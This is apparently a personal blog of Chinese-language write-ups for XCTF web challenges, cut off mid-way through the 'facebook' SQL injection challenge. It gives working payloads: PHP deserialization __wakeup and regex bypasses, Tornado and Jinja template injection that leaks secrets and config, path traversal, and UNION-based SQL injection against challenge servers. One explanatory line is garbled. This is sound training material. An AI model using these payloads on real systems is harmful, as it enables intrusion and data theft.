51nn3rDu5k
51nn3rDu5k

攻防世界各类题目相关

攻防世界

全沾菜鸡一枚的学习记录,如有冒犯还请大佬们多多指正。
这里面的题目自己再写的时候和复现的时候,有许多的是借鉴的大佬们的文章进行复现的,但是由于太多,并没有完整的记录下那些大佬们的博客的文章,在此记录一下自己的学习记录,一方面方便自己学习,一方面帮助一些有需要的人。仍旧再次感谢许多大佬们的文章了!!!

WEB

WEB相关知识

PHP函数漏洞集合

PHP函数漏洞集合https://blog.csdn.net/qq_35078631/article/details/75200157

13个PHP魔术函数https://blog.csdn.net/mnmnwq/article/details/82462108

PHP魔法方法/函数详解https://blog.csdn.net/inqihoo/article/details/9235103?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.edu_weight&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.edu_weight

1.__construct()

实例化对象时被调用,当__construct和以类名为函数名的函数同时

正则相关语法

(1)直接量字符
字符 匹配
字母和数字字符 自身
\o NUL字符
\t 制表符
\n 换行符
\v 垂直制表符
\f 换页符
\r 回车符
\xnn 由十六进制数nn指定的拉丁字符,\x0A=\n
\uxxxx 由十六进制数xxxx指定的Unicode字符,\u0009=\t
\cX 控制字符^X,\cJ=\n
(2)字符类
字符 匹配
[…] 方括号内的任意字符
[^…] 不在方括号内的任意字符
. 除换行符和其他Unicode行终止符之外的任意字符
\w 任何ASCII字符组成的单词[a-zA-Z0-9_]
\W 任何不是ASCII字符组成的单词[ ^a-zA-Z0-9_ ]
\s 任何Unicode空白符
\S 任何非Unicode空白符的字符
\d 任何ASCII数字,[0-9]
\D 除了ASCII数字之外的任何字符
[\b] 退格直接量
(3)重复字符(贪婪匹配)
字符 含义
{n,m} 匹配前一项至少n次,但是不能超过m次
{n,} 匹配前一项至少n次或者更多次
{n} 匹配前一项n次
? 匹配前一项0次或者1次(可选项){0,1}
+ 匹配前一项1次或者多次{1,}
* 匹配前一项0次或者多次(不限次){0,}
(4)选择、分组、引用字符
字符 含义
| 选择,匹配左右子表达式(从左往右,若左边匹配则忽略右边)
(…) 组合
(?:…) 只组合
\n 和第n分组第一次匹配的字符相匹配
(5)锚字符
字符 含义
^ 匹配字符串的开头
$ 匹配字符串的结尾
\b 匹配一个单词的边界 Eg: \bhi\b
\B 匹配非单词边界的位置
(?=p) 正向先行断言,要求接下来的字符都与p匹配,但不包括p那些字符
(?!p) 负向先行断言,要求接下来的字符不与p匹配
(6)修饰符
字符 含义
i 执行不区分大小写的匹配
g 执行全局匹配,找到所有匹配
m 多行匹配模式
(7)String对象
方法 实例 返回 特殊
search() “JavaScript”.search(/script/i)返回4 第一个与之匹配的子串的起始位置,找不到则返回-1 不支持全局检索忽略修饰符g
replace() text.replace(/javascript/gi,“JavaScript”) text.replace(/“([^”]*)”/, ‘“$1”’) 替换后的字符串 $数字 参数若非正则表达式,则直接搜索
match() “1 plus 2 equals 3”.match(/\d+/g) 返回[“1”, “2”, “3”] 由匹配结果组成的数组,未匹配则返回null 非全局搜索时,a[0]存放完整匹配,a[1]存放a[0]与第一个括号括起来表达式相匹配的子串,所以a[n]存放的是$n的内容
split() “123,456,789”.split(“,”) 返回[“123”, “456”, “789”] “1, 2, 3, 4, 5”.split(/\s*,\s*/) 返回[“1”, “2” ,“3”, “4”, “5”] 拆分后的子串数组 参数是正则表达式时,可以指定分隔符,允许留白
(8)RegExp对象
方法 示例 返回 特殊
regExp()
exec()
test()

例题

unserialize3

打开网址得到代码:

class xctf{ //类
public $flag = '111';//public定义flag变量公开可见
public function __wakeup(){
exit('bad requests');
}
?code=

__wakeup经常用在反序列化中,例如重新建立数据库连接,或执行其它初始化操作。所以猜测被反序列化了

但是可以看到这里没有特别对那个字符串序列化,所以把xctf类实例化后,进行反序列化利用php中的new运算符,实例化xctf

new是申请空间的操作符,一般用于类

比如定义了一个class a{public i=0;}

c = n e w a ( ) ; 相 当 于 定 义 了 一 个 基 于 a 类 的 对 象 , 这 时 候 c = new a();相当于定义了一个基于a类的对象,这时候 c=newa();ac->i就是0


class xctf{	//类
public $flag = '111';//public定义flag变量公开可见
public function __wakeup(){
exit('bad requests');
}
}

$a = new xctf();
echo(serialize($a));
?>

下面是运行结果

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

如果直接传参给code会被__wakeup()函数再次序列化,所以要绕过它

利用__wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup执行

序列化返回的字符串格式

O:<length>:"":<n>:{<field name 1><field value 1>...<field name n><field value n>}

O:表示序列化的事对象

< length >:表示序列化的类的名称长度

< class name >:表示序列化的类的名称

< n >:表示被序列化的对象的属性个数

< field name 1>:属性名

< field value 1>:属性值

所以要修改的属性值< n >,即把1改为2以上

O:4:"xctf":2:{s:4:"flag";s:3:"111";}

这里我们对比一下与原来正确的序列化后的有什么区别:

O:4:"xctf":1:{s:4:"flag";s:3:"111";}//正确的
O:4:"xctf":2:{s:4:"flag";s:3:"111";}//错误的

这里就是利用了__wakeup()函数的漏洞

传参给code得到flag

payload
url+/code=o:4:%22xctf%22:2:2:{s:4:%22flag%22;s:3:%22111%22;}
http://220.249.52.133:43457/?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

Web_php_unserialize

题目也是就一个网址上面是一些代码

file = $file; 
  }
  function __destruct() { 
    echo @highlight_file($this->file, true); 
  }
  function __wakeup() { 
    if ($this->file != 'index.php') { 
      //the secret is in the fl4g.php
      $this->file = 'index.php'; 
    } 
  } 
}
if (isset($_GET['var'])) { 
  $var = base64_decode($_GET['var']); 
  if (preg_match('/[oc]:\d+:/i', $var)) { 
    die('stop hacking!'); 
  } else {
    @unserialize($var); 
  } 
} else { 
  highlight_file("index.php"); 
} 
?>

这里面最为重要的是两个点

1.preg_math(’/[oc]:\d+/i’,$var)的绕过

2.unserialize时__wakeup()的绕过

下面是脚本

 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
    $A = new Demo('fl4g.php');//这里定义新的变量
    $C = serialize($A);//序列化$A
    //string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}"
    $C = str_replace('O:4', 'O:+4',$C);//绕过preg_match
    $C = str_replace(':1:', ':2:',$C);//绕过wakeup 只需要让变量数量超过真实数量就行了
    var_dump($C);//没有base64前的payload
    //string(49) "O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}"
    var_dump(base64_encode($C));
    //string(68) "TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ=="
?>
payload
?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

ics-06

打开网页后是一个工控云管理系统

并且所有的页面都一样,只有报表中心不一样

http://220.249.52.133:38959/index.php?id=1

并且这个有一个参数id尝试一下注入发现引号被过滤掉了

而且几乎能够尝试的注入大概试了一下没有发现注入点

因此准备爆破

用火狐设置代理burp suite 准备抓包

接着设置变量id然后设置爆破的数字段

1-10000

后面就是爆破了

知道id=2333的时候发现了数据包的长度与其它数据包的长度是不一样的我们打开数据包的Response发现flag

这道题目就是考察一个burp suite的使用其它的地方也没有什么太大的难度

payload
http://220.249.52.133:38959/index.php?id=2333

easytornado

知识点
tornado模板注入

相关文章地址:

https://cloud.tencent.com/developer/article/1516336

拿到该题目有三个文件:

/flag.txt
/welcome.txt
/hints.txt

都看了一遍我们大概了解到这个题目是想让我们干什么的了

题目告诉了我们flag文件的名称,并且还告诉了我们filehash的计算方法,cookie+filename-hash之后再进行一次hash运算得到filehash的值

我们通过查询知道了tornado有一个模板注入可以获取cookie

模板注入的payload

error?msg={{handler.settings}}

这样通过模板注入我们可以得到cookie相关的值cookie:

{
 'autoreload': True, 
 'compiled_template_cache': False, 
 'cookie_secret': 'a819ace0-0b41-4eb1-8207-3f2b6690a6e9'
}

接着我们去一个在线md5加密网站上加密那个文件名为:/fllllllllllllag的文件

可以得到一个cookie值:

文件md5值:3bf9f6cf685a6dd8defadabfb41a03a1

这样可以得到需要进行md5运算的最后的一串字符是:

a819ace0-0b41-4eb1-8207-3f2b6690a6e93bf9f6cf685a6dd8defadabfb41a03a1

md5运算后:

545f4ea6a10cd541eb50af849b6ed7d6
最终的payload
http://220.249.52.133:48717/file?filename=/fllllllllllllag&filehash=545f4ea6a10cd541eb50af849b6ed7d6

warmup

打开网页是一个图片,我们产看源码发现提示有source.php发现源代码并且还有一个hint.php flag文件是:ffffllllaaaagggg

源代码分析:


    highlight_file(__FILE__);代码高亮显示
    
    class emmm
    {
        public static function checkFile(&$page)        //静态函数
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//白名单
		   //isset()检查变量是否设置  is_string()检查变量是不是字符串
            if (! isset($page) || !is_string($page)) 
            {
                echo "you can't see it";
                return false;
            }
            
		   //这个page变量的值是否是在白名单中
            if (in_array($page, $whitelist)) {
                return true;
            }
		   //mb_strpos()查找字符串在另一个字符串中首次出现的位置
            $_page = mb_substr($page,0,mb_strpos($page . '?', '?'));、
            //这个函数是截取page中?前面的字符串
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);//url解码一次
            $_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));

            if (in_array($_page, $whitelist)) 
            {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
//下面的这个if的意思是
//request()默认情况下包含了 $_GET$_POST$_COOKIE 的数组。不是很安全的一个函数
    if (! empty($_REQUEST['file'])&&is_string($_REQUEST['file'])&&emmm::checkFile($_REQUEST['file'])) 
    {
        include $_REQUEST['file'];
        exit;
    } 
    else 
    {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

这道题目就是需要满足传入的file是等于hint或者source就可以但是后面可以采用路径穿越进行访问flag

payload
http://220.249.52.133:43358/?file=hint.php?/../../../../ffffllllaaaagggg
http://220.249.52.133:43358/?file=hint.php%253f/../../../../ffffllllaaaagggg
http://220.249.52.133:43358/?file=source.php%253f../../../../../ffffllllaaaagggg

NewsCenter

拿到题目打开网页发现一个搜索框,先尝试一下是否用sql注入后续发现是有sql注入的

1' union select 1,2,3#

这里还是显示正常的,但是4就显示不正常了,因此是有三个数据库的

接下来我们可以来查询一下其它的相关信息:

1' union select 1,table_schema,table_name from information_schema.columns#

这个可以查出表名

1' union select 1,2,table_name from information_schema.columns#

这个也是可以的没有上面的那个更加清楚一点

接着我们发现了一个叫做

下面的结果是以上面的payload为

information_schema
CHARACTER_SETS
information_schema
COLLATIONS
information_schema
COLLATION_CHARACTER_SET_APPLICABILITY
information_schema
COLUMNS
information_schema
COLUMN_PRIVILEGES
information_schema
ENGINES
information_schema
EVENTS
information_schema
FILES
information_schema
GLOBAL_STATUS
information_schema
GLOBAL_VARIABLES
information_schema
KEY_COLUMN_USAGE
information_schema
PARAMETERS
information_schema
PARTITIONS
information_schema
PLUGINS
information_schema
PROCESSLIST
information_schema
PROFILING
information_schema
REFERENTIAL_CONSTRAINTS
information_schema
ROUTINES
information_schema
SCHEMATA
information_schema
SCHEMA_PRIVILEGES
information_schema
SESSION_STATUS
information_schema
SESSION_VARIABLES
information_schema
STATISTICS
information_schema
TABLES
information_schema
TABLESPACES
information_schema
TABLE_CONSTRAINTS
information_schema
TABLE_PRIVILEGES
information_schema
TRIGGERS
information_schema
USER_PRIVILEGES
information_schema
VIEWS
information_schema
INNODB_BUFFER_PAGE
information_schema
INNODB_TRX
information_schema
INNODB_BUFFER_POOL_STATS
information_schema
INNODB_LOCK_WAITS
information_schema
INNODB_CMPMEM
information_schema
INNODB_CMP
information_schema
INNODB_LOCKS
information_schema
INNODB_CMPMEM_RESET
information_schema
INNODB_CMP_RESET
information_schema
INNODB_BUFFER_PAGE_LRU
news
news
news
secret_table

这里我们发现有一个secret_table可以重点关注一下

接着去爆字段名:

1' union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'#

得到:

id
int
fl4g
varcha

我们能够得到id和fl4g

接下来就是查看fl4g了

1' union select 1,2,fl4g from secret_table#

得到:

2
QCTF{sq1_inJec7ion_ezzz}

web2

拿到题目又是一个源代码审计的问题,应该是:


$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";

function encode($str){
    $_o=strrev($str);//1.反转字符
    // echo $_o;
    //2.逐位提取各位上的字符转换为ascii码后+1    
    for($_0=0;$_0<strlen($_o);$_0++){
       
        $_c=substr($_o,$_0,1);
        $__=ord($_c)+1;
        $_c=chr($__);
        $_=$_.$_c;   
    } 
    //这一步有点多,显示base64加密一下,接着字符串反向一下最后在来一次rot13加密
    return str_rot13(strrev(base64_encode($_)));
}

highlight_file(__FILE__);
/*
   逆向加密算法,解密$miwen就是flag
*/
?>

这道题目更像是逆向,看一下它的加密逻辑:

1、反转字符串

2、逐位提取各位上的字符转换为ascii后+1

3、进行base64加密

4、反转字符串

5、rot13加密

6、输出密文

下面是我们的解密逻辑:

1.rot13解密

2.反转字符串

3.进行base64解码

4.提取各个字符转换为ascii码后都-1

5.反转一下字符

6.输出明文

下面是i解密脚本

import base64
def rot13(s,offset=13):
	def encodeCh(ch):
		f = lambda x:chr((ord(ch)-x+offset)%26+x)
		return f(97) if ch.islower() else (f(65) if ch.isupper()else ch)
	return ''.join(encodeCh(c) for c in s)


def main():
    miwen = 'a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws'
    miwen = rot13(miwen)#先进行一次rot13加密
    miwen = miwen[::-1]#接着倒序进行一次
    miwen = base64.b64decode(miwen)#进行base64解码
    miwen = str(miwen,'utf-8')
    print(miwen)
    mingwen = ""
    #提取各个字符转换为ascii码之后都-1
    for _0 in range(0, len(miwen)):
        _c = ord(miwen[_0])
        fuck = (_c)-1
        mingwen+=(chr(fuck))
    print(mingwen[::-1])#反转一下字符串
if __name__ == '__main__':
    main()

shrine

import flask
import os
app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')
#注册了一个名为flag的config,猜测这就是flag,但是下面有一个黑名单过滤了config和self并且还过滤了括号

@app.route('/')#访问主页面就是返回源代码
def index():
    return open(__file__).read()

@app.route('/shrine/')#访问该路径可以触发模板注入
def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')#过滤括号
        blacklist = ['config', 'self']#过滤config和self
        #下面这行代码的含义是把黑名单的东西遍历一遍并且替换为空
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
    app.run(debug=True)

看到题目导入了flask想到模板注入

再根据代码分析先测试一波看有没有模板注入

http://220.249.52.133:57648/shrine/{{2+2}}

发现页面返回4说明存在模板注入

并且也过滤了config和self和括号

但是别忘了还有python的内置函数可以使用,比如说url_for和get_flashed_messages

http://220.249.52.133:57648/shrine/{{url_for.__globals__}}

得到

{'find_package': <function find_package at 0x7f3a17d4f140>, 
 '_find_package_path': <function _find_package_path at 0x7f3a17d4f0c8>, 
 'get_load_dotenv': <function get_load_dotenv at 0x7f3a17e71a28>, 
 '_PackageBoundObject': <class 'flask.helpers._PackageBoundObject'>, 
 'current_app': <Flask 'app'>, 
 'PY2': True, 
 'send_from_directory': <function send_from_directory at 0x7f3a17e71ed8>, 
 'session': <NullSession {}>, 
 'io': <module 'io' from '/usr/local/lib/python2.7/io.pyc'>, 
 'get_flashed_messages': <function get_flashed_messages at 0x7f3a17e71d70>, 
 'BadRequest': <class 'werkzeug.exceptions.BadRequest'>, 
 'is_ip': <function is_ip at 0x7f3a17d4f7d0>,  'pkgutil'<module'pkgutil'from'/usr/local/lib/python2.7/pkgutil.pyc'>, 
 'BuildError': <class 'werkzeug.routing.BuildError'>, 
 'url_quote': <function url_quote at 0x7f3a180c1aa0>, 
 'FileSystemLoader': <class 'jinja2.loaders.FileSystemLoader'>, 
 'get_root_path': <function get_root_path at 0x7f3a17e71f50>, 
 '__package__': 'flask', 'locked_cached_property': <class 'flask.helpers.locked_cached_property'>,
 '_app_ctx_stack': <werkzeug.local.LocalStack object at 0x7f3a17ea1750>, 
 '_endpoint_from_view_func': <function _endpoint_from_view_func at 0x7f3a17e71aa0>, 
 'total_seconds': <function total_seconds at 0x7f3a17d4f1b8>, 
 'fspath': <function fspath at 0x7f3a17e91e60>, 
 'get_env': <function get_env at 0x7f3a17e716e0>, 
 'RequestedRangeNotSatisfiable': <class 'werkzeug.exceptions.RequestedRangeNotSatisfiable'>, 
 'flash': <function flash at 0x7f3a17e71cf8>, 
 'mimetypes': <module 'mimetypes' from '/usr/local/lib/python2.7/mimetypes.pyc'>, 
 'adler32': <built-in function adler32>, 
 'get_template_attribute': <function get_template_attribute at 0x7f3a17e71c80>, 
 '_request_ctx_stack': <werkzeug.local.LocalStack object at 0x7f3a17e96290>, 
 '__builtins__': 
 {
     'bytearray': <type 'bytearray'>, 
     'IndexError': <type 'exceptions.IndexError'>, 
     'all': <built-in function all>, 
     'help': Type help() for interactive help, or help(object) for help about object., 
     'vars': <built-in function vars>, 
     'SyntaxError': <type 'exceptions.SyntaxError'>, 
     'unicode': <type 'unicode'>, 
     'UnicodeDecodeError': <type 'exceptions.UnicodeDecodeError'>, 
     'memoryview': <type 'memoryview'>, 
     'isinstance': <built-in function isinstance>, 
     'copyright': Copyright (c) 2001-2019 Python Software Foundation. All Rights Reserved. Copyright (c) 2000 BeOpen.com. All Rights Reserved. Copyright (c) 1995-2001 Corporation for National Research Initiatives. All Rights Reserved. Copyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam. All Rights Reserved., 
     'NameError': <type 'exceptions.NameError'>, 
     'BytesWarning': <type 'exceptions.BytesWarning'>, 
     'dict': <type 'dict'>, 'input': <built-in function input>, 
     'oct': <built-in function oct>, 
     'bin': <built-in function bin>, 
     'SystemExit': <type 'exceptions.SystemExit'>, 
     'StandardError': <type 'exceptions.StandardError'>, 
     'format': <built-in function format>, 
     'repr': <built-in function repr>, 
     'sorted': <built-in function sorted>, 
     'False': False, 
     'RuntimeWarning': <type 'exceptions.RuntimeWarning'>, 
     'list': <type 'list'>, 
     'iter': <built-in function iter>, 
     'reload': <built-in function reload>, 
     'Warning': <type 'exceptions.Warning'>, 
     '__package__': None, 
     'round': <built-in function round>, 
     'dir': <built-in function dir>, 
     'cmp': <built-in function cmp>, 
     'set': <type 'set'>, 
     'bytes': <type 'str'>, 
     'reduce': <built-in function reduce>, 
     'intern': <built-in function intern>, 
     'issubclass': <built-in function issubclass>, 
     'Ellipsis': Ellipsis, 
     'EOFError': <type 'exceptions.EOFError'>, 
     'locals': <built-in function locals>, 
     'BufferError': <type 'exceptions.BufferError'>, 
     'slice': <type 'slice'>, 
     'FloatingPointError': <type 'exceptions.FloatingPointError'>, 
     'sum': <built-in function sum>, 
     'getattr': <built-in function getattr>, 
     'abs': <built-in function abs>, 
     'exit': Use exit() or Ctrl-D (i.e. EOF) to exit, 
     'print': <built-in function print>, 
     'True': True, 
     'FutureWarning': <type 'exceptions.FutureWarning'>, 
     'ImportWarning': <type 'exceptions.ImportWarning'>, 
     'None': None, 
     'hash': <built-in function hash>, 
     'ReferenceError': <type 'exceptions.ReferenceError'>, 
     'len': <built-in function len>, 
     'credits': Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands for supporting Python development. See www.python.org for more information., 
     'frozenset': <type 'frozenset'>, 
     '__name__': '__builtin__', 
     'ord': <built-in function ord>, 
     'super': <type 'super'>, 
     'TypeError': <type 'exceptions.TypeError'>, 
     'license': Type license() to see the full license text, 
     'KeyboardInterrupt': <type 'exceptions.KeyboardInterrupt'>, 
     'UserWarning': <type 'exceptions.UserWarning'>, 
     'filter': <built-in function filter>, 
     'range': <built-in function range>, 
     'staticmethod': <type 'staticmethod'>, 
     'SystemError': <type 'exceptions.SystemError'>, 
     'BaseException': <type 'exceptions.BaseException'>, 
     'pow': <built-in function pow>, 
     'RuntimeError': <type 'exceptions.RuntimeError'>, 
     'float': <type 'float'>, 
     'MemoryError': <type 'exceptions.MemoryError'>, 
     'StopIteration': <type 'exceptions.StopIteration'>, 
     'globals': <built-in function globals>, 
     'divmod': <built-in function divmod>, 
     'enumerate': <type 'enumerate'>, 
     'apply': <built-in function apply>, 
     'LookupError': <type 'exceptions.LookupError'>, 
     'open': <built-in function open>, 
     'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 
     'basestring': <type 'basestring'>, 
     'UnicodeError': <type 'exceptions.UnicodeError'>, 
     'zip': <built-in function zip>, 
     'hex': <built-in function hex>, 
     'long': <type 'long'>, 
     'next': <built-in function next>, 
     'ImportError': <type 'exceptions.ImportError'>, 
     'chr': <built-in function chr>, 
     'xrange': <type 'xrange'>, 
     'type': <type 'type'>, 
     '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", 'Exception': <type 'exceptions.Exception'>, 'tuple': <type 'tuple'>, 'UnicodeTranslateError': <type 'exceptions.UnicodeTranslateError'>, 'reversed': <type 'reversed'>, 'UnicodeEncodeError': <type 'exceptions.UnicodeEncodeError'>, 'IOError': <type 'exceptions.IOError'>, 'hasattr': <built-in function hasattr>, 'delattr': <built-in function delattr>, 'setattr': <built-in function setattr>, 'raw_input': <built-in function raw_input>, 'SyntaxWarning': <type 'exceptions.SyntaxWarning'>, 'compile': <built-in function compile>, 'ArithmeticError': <type 'exceptions.ArithmeticError'>, 'str': <type 'str'>, 'property': <type 'property'>, 'GeneratorExit': <type 'exceptions.GeneratorExit'>, 'int': <type 'int'>, '__import__': <built-in function __import__>, 'KeyError': <type 'exceptions.KeyError'>, 'coerce': <built-in function coerce>, 'PendingDeprecationWarning': <type 'exceptions.PendingDeprecationWarning'>, 'file': <type 'file'>, 'EnvironmentError': <type 'exceptions.EnvironmentError'>, 'unichr': <built-in function unichr>, 'id': <built-in function id>, 'OSError': <type 'exceptions.OSError'>, 'DeprecationWarning': <type 'exceptions.DeprecationWarning'>, 'min': <built-in function min>, 'UnicodeWarning': <type 'exceptions.UnicodeWarning'>, 'execfile': <built-in function execfile>, 'any': <built-in function any>, 'complex': <type 'complex'>, 'bool': <type 'bool'>, 'ValueError': <type 'exceptions.ValueError'>, 'NotImplemented': NotImplemented, 'map': <built-in function map>, 'buffer': <type 'buffer'>, 'max': <built-in function max>, 'object': <type 'object'>, 'TabError': <type 'exceptions.TabError'>, 'callable': <built-in function callable>, 'ZeroDivisionError': <type 'exceptions.ZeroDivisionError'>, 'eval': <built-in function eval>, '__debug__': True, 'IndentationError': <type 'exceptions.IndentationError'>, 'AssertionError': <type 'exceptions.AssertionError'>, 'classmethod': <type 'classmethod'>, 'UnboundLocalError': <type 'exceptions.UnboundLocalError'>, 'NotImplementedError': <type 'exceptions.NotImplementedError'>, 'AttributeError': <type 'exceptions.AttributeError'>, 'OverflowError': <type 'exceptions.OverflowError'>}, 'text_type': <type 'unicode'>, '__file__': '/usr/local/lib/python2.7/site-packages/flask/helpers.pyc', 'get_debug_flag': <function get_debug_flag at 0x7f3a17e717d0>, 'RLock': <function RLock at 0x7f3a187992a8>, 'safe_join': <function safe_join at 0x7f3a17e71e60>, 'sys': <module 'sys' (built-in)>, 'Headers': <class 'werkzeug.datastructures.Headers'>, 'stream_with_context': <function stream_with_context at 0x7f3a17e71b18>, '_os_alt_seps': [], '__name__': 'flask.helpers', '_missing': <object object at 0x7f3a188fd1b0>, 'posixpath': <module 'posixpath' from '/usr/local/lib/python2.7/posixpath.pyc'>, 'NotFound': <class 'werkzeug.exceptions.NotFound'>, 'unicodedata': <module 'unicodedata' from '/usr/local/lib/python2.7/lib-dynload/unicodedata.so'>, 'wrap_file': <function wrap_file at 0x7f3a180d7668>, 'socket': <module 'socket' from '/usr/local/lib/python2.7/socket.pyc'>, 'update_wrapper': <function update_wrapper at 0x7f3a187e41b8>, 'make_response': <function make_response at 0x7f3a17e71b90>, 'request': <Request 'http://220.249.52.133:57648/shrine/%7B%7Burl_for.__globals__%7D%7D' [GET]>, 'string_types': (<type 'str'>, <type 'unicode'>), 'message_flashed': <flask.signals._FakeSignal object at 0x7f3a17d4d210>, '__doc__': '\n flask.helpers\n ~~~~~~~~~~~~~\n\n Implements various helpers.\n\n :copyright: 2010 Pallets\n :license: BSD-3-Clause\n', 'send_file': <function send_file at 0x7f3a17e71de8>, 'time': <built-in function time>, 'url_for': <function url_for at 0x7f3a17e71c08>, '_matching_loader_thinks_module_is_package': <function _matching_loader_thinks_module_is_package at 0x7f3a17d4f050>, 'os': <module 'os' from '/usr/local/lib/python2.7/os.pyc'>}

http://220.249.52.133:57648/shrine/{{url_for.__globals__['current_app'].config}}

得到

<Config {'JSON_AS_ASCII': True,
         'USE_X_SENDFILE': False,
         'SESSION_COOKIE_SECURE': False, 
         'SESSION_COOKIE_PATH': None,
         'SESSION_COOKIE_DOMAIN': None, 
         'SESSION_COOKIE_NAME': 'session', 
         'MAX_COOKIE_SIZE': 4093, 
         'SESSION_COOKIE_SAMESITE': None, 
         'PROPAGATE_EXCEPTIONS': None, 
         'ENV': 'production',
         'DEBUG': False,
         'SECRET_KEY': None,
         'EXPLAIN_TEMPLATE_LOADING': False, 
         'MAX_CONTENT_LENGTH': None, 
         'APPLICATION_ROOT': '/', 
         'SERVER_NAME': None, 
         'FLAG': 'flag{shrine_is_good_ssti}', 
         'PREFERRED_URL_SCHEME': 'http',
         'JSONIFY_PRETTYPRINT_REGULAR': False, 
         'TESTING': False,
         'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31),
         'TEMPLATES_AUTO_RELOAD': None, 
         'TRAP_BAD_REQUEST_ERRORS': None,
         'JSON_SORT_KEYS': True, 
         'JSONIFY_MIMETYPE': 'application/json',
         'SESSION_COOKIE_HTTPONLY': True, 
         'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200),
         'PRESERVE_CONTEXT_ON_EXCEPTION': None, 
         'SESSION_REFRESH_EACH_REQUEST': True,
         'TRAP_HTTP_EXCEPTIONS': False}>

get flashed messages

返回之前在flask中通过flash()传入的闪现信息列表,把字符串对象表示的消息加入到一个消息队列中,然后通过调用get_flashed_messages()方法取出(闪现信息只能取出一次,取出后闪现信息会被清空)

/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

<Config {'JSON_AS_ASCII': True,
         'USE_X_SENDFILE': False, 
         'SESSION_COOKIE_SECURE': False,
         'SESSION_COOKIE_PATH': None,
         'SESSION_COOKIE_DOMAIN': None, 
         'SESSION_COOKIE_NAME': 'session',
         'MAX_COOKIE_SIZE': 4093, 
         'SESSION_COOKIE_SAMESITE': None, 
         'PROPAGATE_EXCEPTIONS': None, 
         'ENV': 'production',
         'DEBUG': False, 
         'SECRET_KEY': None,
         'EXPLAIN_TEMPLATE_LOADING': False,
         'MAX_CONTENT_LENGTH': None, 
         'APPLICATION_ROOT': '/',
         'SERVER_NAME': None, 
         'FLAG': 'flag{shrine_is_good_ssti}', 
         'PREFERRED_URL_SCHEME': 'http', 
         'JSONIFY_PRETTYPRINT_REGULAR': False, 
         'TESTING': False, 
         'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 
         'TEMPLATES_AUTO_RELOAD': None, 
         'TRAP_BAD_REQUEST_ERRORS': None,
         'JSON_SORT_KEYS': True, 
         'JSONIFY_MIMETYPE': 'application/json', 
         'SESSION_COOKIE_HTTPONLY': True,
         'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200),
         'PRESERVE_CONTEXT_ON_EXCEPTION': None, 
         'SESSION_REFRESH_EACH_REQUEST': True, 
         'TRAP_HTTP_EXCEPTIONS': False}>

facebook

打开网页首先就是一个类似于脸书的界面然后是一个登录框和一个注册框,显示尝试了一下注入,感觉没戏,接着去查看一下其它的路径,有一个user.php.bak文件可以下载,下载后是源代码



class UserInfo
{//三个公共变量没有passwd这个变量
    public $name = "";
    public $age = 0;
    public $blog = "";

    //下面这个魔术函数:实例化对象时被调用,当__construct以类名为函数名的函数同时存在时,该函数被调用,另一个不被调用
    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();//初始化一个curl会话
        curl_setopt($ch, CURLOPT_URL, $url);//设置需要抓取的url
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//设置curl参数,要求结果保存到字符串还是输出到屏幕上
        $output = curl_exec($ch);//运行curl,请求网页
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);//获取一个curl链接资源句柄的信息
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
        return $output;
    }
    
    public function getBlogContents ()
    {//函数作用:获取博客内容
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {//该函数判断blog是不是无效的
        $blog = $this->blog;
        //下面的正则匹配是
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
   #这个正则的意思是:
    }
}

正则语法

^xxxx$表示匹配开头和结尾,   \S匹配非空白字符串     \i表示忽略大小写

我们先尝试一下各个部分的功能,发现join后有view.php的no参数存在注入:

先是order by尝试查出列数

http://220.249.52.133:35346/view.php?no=1 order by 4

正常回显

http://220.249.52.133:35346/view.php?no=1 order by 5

不正常回显

